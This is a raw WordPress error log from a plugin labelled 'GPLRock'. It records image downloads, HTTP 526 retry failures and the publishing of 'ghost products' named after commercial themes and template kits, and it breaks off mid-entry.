https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53e51846.jpg [04-Apr-2026 08:06:50 UTC] GPLRock: Ghost product published with image - Product ID: thrive-apprentice [04-Apr-2026 08:06:52 UTC] GPLRock: Image downloaded successfully for product thrive-leads (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92b18cbe.jpg [04-Apr-2026 08:06:52 UTC] GPLRock: Using pre-downloaded image for product thrive-leads: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92b18cbe.jpg [04-Apr-2026 08:06:52 UTC] GPLRock: Ghost product published with image - Product ID: thrive-leads [04-Apr-2026 08:06:54 UTC] GPLRock: Image downloaded successfully for product ait-subscribe-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9a56a95.jpg [04-Apr-2026 08:06:54 UTC] GPLRock: Using pre-downloaded image for product ait-subscribe-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9a56a95.jpg [04-Apr-2026 08:06:54 UTC] GPLRock: Ghost product published with image - Product ID: ait-subscribe-form [04-Apr-2026 08:19:54 UTC] GPLRock: Image downloaded successfully for product tecnologia-it-saas-software-technology-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb984122.png [04-Apr-2026 08:19:54 UTC] GPLRock: Using pre-downloaded image for product tecnologia-it-saas-software-technology-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb984122.png [04-Apr-2026 08:19:54 UTC] GPLRock: Ghost product published with image - Product ID: tecnologia-it-saas-software-technology-wordpress-theme [04-Apr-2026 08:19:56 UTC] GPLRock: Image downloaded successfully for product teapoz-tea-shop-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7121a4d0.jpg [04-Apr-2026 08:19:56 UTC] GPLRock: Using pre-downloaded image for product teapoz-tea-shop-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7121a4d0.jpg [04-Apr-2026 08:19:56 UTC] GPLRock: Ghost product published with image - Product ID: teapoz-tea-shop-woocommerce-theme [04-Apr-2026 08:19:58 UTC] GPLRock: Image downloaded successfully for product hospital-management-system-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8591b0d.jpg [04-Apr-2026 08:19:58 UTC] GPLRock: Using pre-downloaded image for product hospital-management-system-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b8591b0d.jpg [04-Apr-2026 08:19:58 UTC] GPLRock: Ghost product published with image - Product ID: hospital-management-system-for-wordpress [04-Apr-2026 08:20:00 UTC] GPLRock: Image downloaded successfully for product postx-pro-gutenberg-post-blocks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05c4ce60.jpg [04-Apr-2026 08:20:00 UTC] GPLRock: Using pre-downloaded image for product postx-pro-gutenberg-post-blocks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05c4ce60.jpg [04-Apr-2026 08:20:00 UTC] GPLRock: Ghost product published with image - Product ID: postx-pro-gutenberg-post-blocks [04-Apr-2026 08:20:02 UTC] GPLRock: Image downloaded successfully for product bexpres-transport-logistics-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7efd7366.png [04-Apr-2026 08:20:02 UTC] GPLRock: Using pre-downloaded image for product bexpres-transport-logistics-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7efd7366.png [04-Apr-2026 08:20:02 UTC] GPLRock: Ghost product published with image - Product ID: bexpres-transport-logistics-wordpress-theme [04-Apr-2026 08:20:05 UTC] GPLRock: Image downloaded successfully for product ecomus-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36286c6e.png [04-Apr-2026 08:20:05 UTC] GPLRock: Using pre-downloaded image for product ecomus-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36286c6e.png [04-Apr-2026 08:20:05 UTC] GPLRock: Ghost product published with image - Product ID: ecomus-multipurpose-woocommerce-theme [04-Apr-2026 08:20:07 UTC] GPLRock: Image downloaded successfully for product reimvpn-proxy-vpn-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adbe3116.jpg [04-Apr-2026 08:20:07 UTC] GPLRock: Using pre-downloaded image for product reimvpn-proxy-vpn-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adbe3116.jpg [04-Apr-2026 08:20:07 UTC] GPLRock: Ghost product published with image - Product ID: reimvpn-proxy-vpn-services-elementor-template-kit [04-Apr-2026 08:20:09 UTC] GPLRock: Image downloaded successfully for product pixelo-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1fc18dc.jpg [04-Apr-2026 08:20:09 UTC] GPLRock: Using pre-downloaded image for product pixelo-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1fc18dc.jpg [04-Apr-2026 08:20:09 UTC] GPLRock: Ghost product published with image - Product ID: pixelo-digital-agency-elementor-template-kit [04-Apr-2026 08:20:12 UTC] GPLRock: Image downloaded successfully for product wellprinted-print-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5107f104.png [04-Apr-2026 08:20:12 UTC] GPLRock: Using pre-downloaded image for product wellprinted-print-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5107f104.png [04-Apr-2026 08:20:12 UTC] GPLRock: Ghost product published with image - Product ID: wellprinted-print-service-elementor-template-kit [04-Apr-2026 08:20:13 UTC] GPLRock: Image downloaded successfully for product homelyt-modern-real-estate-property-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-341b0da6.jpg [04-Apr-2026 08:20:13 UTC] GPLRock: Using pre-downloaded image for product homelyt-modern-real-estate-property-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-341b0da6.jpg [04-Apr-2026 08:20:13 UTC] GPLRock: Ghost product published with image - Product ID: homelyt-modern-real-estate-property-elementor-template-kit [04-Apr-2026 08:21:06 UTC] GPLRock: Image downloaded successfully for product ever-organize-personal-assistant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f2e2bc7.webp [04-Apr-2026 08:21:06 UTC] GPLRock: Using pre-downloaded image for product ever-organize-personal-assistant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f2e2bc7.webp [04-Apr-2026 08:21:06 UTC] GPLRock: Ghost product published with image - Product ID: ever-organize-personal-assistant-elementor-template-kit [04-Apr-2026 08:21:07 UTC] GPLRock: Image downloaded successfully for product eureka-online-learning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc8bf342.webp [04-Apr-2026 08:21:08 UTC] GPLRock: Using pre-downloaded image for product eureka-online-learning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc8bf342.webp [04-Apr-2026 08:21:08 UTC] GPLRock: Ghost product published with image - Product ID: eureka-online-learning-elementor-template-kit [04-Apr-2026 08:21:09 UTC] GPLRock: Image downloaded successfully for product escal-transportation-logistics-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af1803af.webp [04-Apr-2026 08:21:09 UTC] GPLRock: Using pre-downloaded image for product escal-transportation-logistics-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af1803af.webp [04-Apr-2026 08:21:09 UTC] GPLRock: Ghost product published with image - Product ID: escal-transportation-logistics-elementor-template-kit [04-Apr-2026 08:21:12 UTC] GPLRock: Image downloaded successfully for product envotek-it-solution-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61b41681.webp [04-Apr-2026 08:21:12 UTC] GPLRock: Using pre-downloaded image for product envotek-it-solution-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61b41681.webp [04-Apr-2026 08:21:12 UTC] GPLRock: Ghost product published with image - Product ID: envotek-it-solution-services-elementor-template-kit [04-Apr-2026 08:21:13 UTC] GPLRock: Image downloaded successfully for product energize-solar-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-79aedc8f.webp [04-Apr-2026 08:21:13 UTC] GPLRock: Using pre-downloaded image for product energize-solar-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-79aedc8f.webp [04-Apr-2026 08:21:13 UTC] GPLRock: Ghost product published with image - Product ID: energize-solar-renewable-energy-elementor-template-kit [04-Apr-2026 08:21:15 UTC] GPLRock: Image downloaded successfully for product elixir-perfume-maker-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0f5b001.webp [04-Apr-2026 08:21:15 UTC] GPLRock: Using pre-downloaded image for product elixir-perfume-maker-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0f5b001.webp [04-Apr-2026 08:21:15 UTC] GPLRock: Ghost product published with image - Product ID: elixir-perfume-maker-elementor-template-kit [04-Apr-2026 08:21:17 UTC] GPLRock: Image downloaded successfully for product electriza-electrical-installation-maintenance-services-eleor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e27f3e0a.jpg [04-Apr-2026 08:21:17 UTC] GPLRock: Using pre-downloaded image for product electriza-electrical-installation-maintenance-services-eleor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e27f3e0a.jpg [04-Apr-2026 08:21:17 UTC] GPLRock: Ghost product published with image - Product ID: electriza-electrical-installation-maintenance-services-eleor-template-kit [04-Apr-2026 08:21:18 UTC] GPLRock: Image downloaded successfully for product eightsy-billiard-school-sport-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76141705.webp [04-Apr-2026 08:21:18 UTC] GPLRock: Using pre-downloaded image for product eightsy-billiard-school-sport-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76141705.webp [04-Apr-2026 08:21:18 UTC] GPLRock: Ghost product published with image - Product ID: eightsy-billiard-school-sport-club-elementor-template-kit [04-Apr-2026 08:21:20 UTC] GPLRock: Image downloaded successfully for product edukul-online-learning-education-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49a2b631.webp [04-Apr-2026 08:21:20 UTC] GPLRock: Using pre-downloaded image for product edukul-online-learning-education-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49a2b631.webp [04-Apr-2026 08:21:20 UTC] GPLRock: Ghost product published with image - Product ID: edukul-online-learning-education-template-kit [04-Apr-2026 08:21:21 UTC] GPLRock: Image downloaded successfully for product edia-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2268299.webp [04-Apr-2026 08:21:21 UTC] GPLRock: Using pre-downloaded image for product edia-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2268299.webp [04-Apr-2026 08:21:21 UTC] GPLRock: Ghost product published with image - Product ID: edia-blog-magazine-elementor-template-kit [04-Apr-2026 08:22:04 UTC] GPLRock: Image download failed for product dreamhome-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:06 UTC] GPLRock: Image download failed for product dreamhome-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreamhome---single-property-wordpress-theme-33135.webp for product dreamhome-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:08 UTC] GPLRock: Image download failed for product dreamhome-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:10 UTC] GPLRock: Image download failed for product dreamhome-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dreamhome---single-property-wordpress-theme-33135.webp for product dreamhome-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:13 UTC] GPLRock WARNING: Image download failed for product dreamhome-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dreamhome---single-property-wordpress-theme-33135.webp [04-Apr-2026 08:22:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dreamhome-single-property-wordpress-theme [04-Apr-2026 08:22:13 UTC] GPLRock: Image download failed for product litl-pal-animal-shelter-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:15 UTC] GPLRock: Image download failed for product litl-pal-animal-shelter-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/litl-pal---animal-shelter--charity-wordpress-theme-22155.webp for product litl-pal-animal-shelter-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:17 UTC] GPLRock: Image download failed for product litl-pal-animal-shelter-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:19 UTC] GPLRock: Image download failed for product litl-pal-animal-shelter-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/litl-pal---animal-shelter--charity-wordpress-theme-22155.webp for product litl-pal-animal-shelter-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:21 UTC] GPLRock WARNING: Image download failed for product litl-pal-animal-shelter-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/litl-pal---animal-shelter--charity-wordpress-theme-22155.webp [04-Apr-2026 08:22:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: litl-pal-animal-shelter-charity-wordpress-theme [04-Apr-2026 08:22:21 UTC] GPLRock: Image download failed for product konta-construction-and-real-estate-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:23 UTC] GPLRock: Image download failed for product konta-construction-and-real-estate-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konta---construction-and-real-estate-company-wordpress-theme-1466.webp for product konta-construction-and-real-estate-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:26 UTC] GPLRock: Image download failed for product konta-construction-and-real-estate-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:28 UTC] GPLRock: Image download failed for product konta-construction-and-real-estate-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konta---construction-and-real-estate-company-wordpress-theme-1466.webp for product konta-construction-and-real-estate-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:30 UTC] GPLRock WARNING: Image download failed for product konta-construction-and-real-estate-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/konta---construction-and-real-estate-company-wordpress-theme-1466.webp [04-Apr-2026 08:22:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: konta-construction-and-real-estate-company-wordpress-theme [04-Apr-2026 08:22:30 UTC] GPLRock: Image download failed for product tipsy-liquor-store-wine-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:32 UTC] GPLRock: Image download failed for product tipsy-liquor-store-wine-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tipsy---liquor-store--wine-shop-wordpress-theme-21193.webp for product tipsy-liquor-store-wine-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:34 UTC] GPLRock: Image download failed for product tipsy-liquor-store-wine-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:36 UTC] GPLRock: Image download failed for product tipsy-liquor-store-wine-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tipsy---liquor-store--wine-shop-wordpress-theme-21193.webp for product tipsy-liquor-store-wine-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:39 UTC] GPLRock WARNING: Image download failed for product tipsy-liquor-store-wine-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tipsy---liquor-store--wine-shop-wordpress-theme-21193.webp [04-Apr-2026 08:22:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tipsy-liquor-store-wine-shop-wordpress-theme [04-Apr-2026 08:22:39 UTC] GPLRock: Image download failed for product westand-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:41 UTC] GPLRock: Image download failed for product westand-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/westand---multi-purpose-wordpress-theme-28753.webp for product westand-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:43 UTC] GPLRock: Image download failed for product westand-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:45 UTC] GPLRock: Image download failed for product westand-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/westand---multi-purpose-wordpress-theme-28753.webp for product westand-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:47 UTC] GPLRock WARNING: Image download failed for product westand-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/westand---multi-purpose-wordpress-theme-28753.webp [04-Apr-2026 08:22:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: westand-multi-purpose-wordpress-theme [04-Apr-2026 08:22:47 UTC] GPLRock: Image download failed for product hotale-hotel-booking-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:50 UTC] GPLRock: Image download failed for product hotale-hotel-booking-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotale---hotel-booking-wordpress-4906.webp for product hotale-hotel-booking-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:52 UTC] GPLRock: Image download failed for product hotale-hotel-booking-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:54 UTC] GPLRock: Image download failed for product hotale-hotel-booking-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotale---hotel-booking-wordpress-4906.webp for product hotale-hotel-booking-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:22:56 UTC] GPLRock WARNING: Image download failed for product hotale-hotel-booking-wordpress. URL: https://meldwp.com/wp-content/uploads/hotale---hotel-booking-wordpress-4906.webp [04-Apr-2026 08:22:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotale-hotel-booking-wordpress [04-Apr-2026 08:22:56 UTC] GPLRock: Image download failed for product falar-college-university-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:22:58 UTC] GPLRock: Image download failed for product falar-college-university-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falar---college-university-elementor-wordpress-theme-24363.webp for product falar-college-university-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:00 UTC] GPLRock: Image download failed for product falar-college-university-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:03 UTC] GPLRock: Image download failed for product falar-college-university-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/falar---college-university-elementor-wordpress-theme-24363.webp for product falar-college-university-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:05 UTC] GPLRock WARNING: Image download failed for product falar-college-university-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/falar---college-university-elementor-wordpress-theme-24363.webp [04-Apr-2026 08:23:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: falar-college-university-elementor-wordpress-theme [04-Apr-2026 08:23:05 UTC] GPLRock: Image download failed for product entr-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:07 UTC] GPLRock: Image download failed for product entr-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entr---interior-design-wordpress-theme-24235.webp for product entr-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:09 UTC] GPLRock: Image download failed for product entr-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:11 UTC] GPLRock: Image download failed for product entr-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entr---interior-design-wordpress-theme-24235.webp for product entr-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:13 UTC] GPLRock WARNING: Image download failed for product entr-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/entr---interior-design-wordpress-theme-24235.webp [04-Apr-2026 08:23:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: entr-interior-design-wordpress-theme [04-Apr-2026 08:23:14 UTC] GPLRock: Image download failed for product rhoomy-real-estate-wordpress-listing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:16 UTC] GPLRock: Image download failed for product rhoomy-real-estate-wordpress-listing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rhoomy--real-estate-wordpress-listing-theme-28773.webp for product rhoomy-real-estate-wordpress-listing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:18 UTC] GPLRock: Image download failed for product rhoomy-real-estate-wordpress-listing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:20 UTC] GPLRock: Image download failed for product rhoomy-real-estate-wordpress-listing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rhoomy--real-estate-wordpress-listing-theme-28773.webp for product rhoomy-real-estate-wordpress-listing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:22 UTC] GPLRock WARNING: Image download failed for product rhoomy-real-estate-wordpress-listing-theme. URL: https://meldwp.com/wp-content/uploads/rhoomy--real-estate-wordpress-listing-theme-28773.webp [04-Apr-2026 08:23:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rhoomy-real-estate-wordpress-listing-theme [04-Apr-2026 08:23:23 UTC] GPLRock: Image download failed for product temple-of-god-religion-and-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:25 UTC] GPLRock: Image download failed for product temple-of-god-religion-and-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/temple-of-god---religion-and-church-wordpress-theme-3094.webp for product temple-of-god-religion-and-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:27 UTC] GPLRock: Image download failed for product temple-of-god-religion-and-church-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:29 UTC] GPLRock: Image download failed for product temple-of-god-religion-and-church-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/temple-of-god---religion-and-church-wordpress-theme-3094.webp for product temple-of-god-religion-and-church-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:31 UTC] GPLRock WARNING: Image download failed for product temple-of-god-religion-and-church-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/temple-of-god---religion-and-church-wordpress-theme-3094.webp [04-Apr-2026 08:23:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: temple-of-god-religion-and-church-wordpress-theme [04-Apr-2026 08:23:40 UTC] GPLRock: Image download failed for product estiene-sweets-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:43 UTC] GPLRock: Image download failed for product estiene-sweets-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/estiene---sweets--bakery-wordpress-theme-14300.webp for product estiene-sweets-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:45 UTC] GPLRock: Image download failed for product estiene-sweets-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:47 UTC] GPLRock: Image download failed for product estiene-sweets-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/estiene---sweets--bakery-wordpress-theme-14300.webp for product estiene-sweets-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:49 UTC] GPLRock WARNING: Image download failed for product estiene-sweets-bakery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/estiene---sweets--bakery-wordpress-theme-14300.webp [04-Apr-2026 08:23:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: estiene-sweets-bakery-wordpress-theme [04-Apr-2026 08:23:49 UTC] GPLRock: Image download failed for product apicona-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:51 UTC] GPLRock: Image download failed for product apicona-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apicona---health--medical-wordpress-theme-28749.webp for product apicona-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:54 UTC] GPLRock: Image download failed for product apicona-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:56 UTC] GPLRock: Image download failed for product apicona-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:23:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apicona---health--medical-wordpress-theme-28749.webp for product 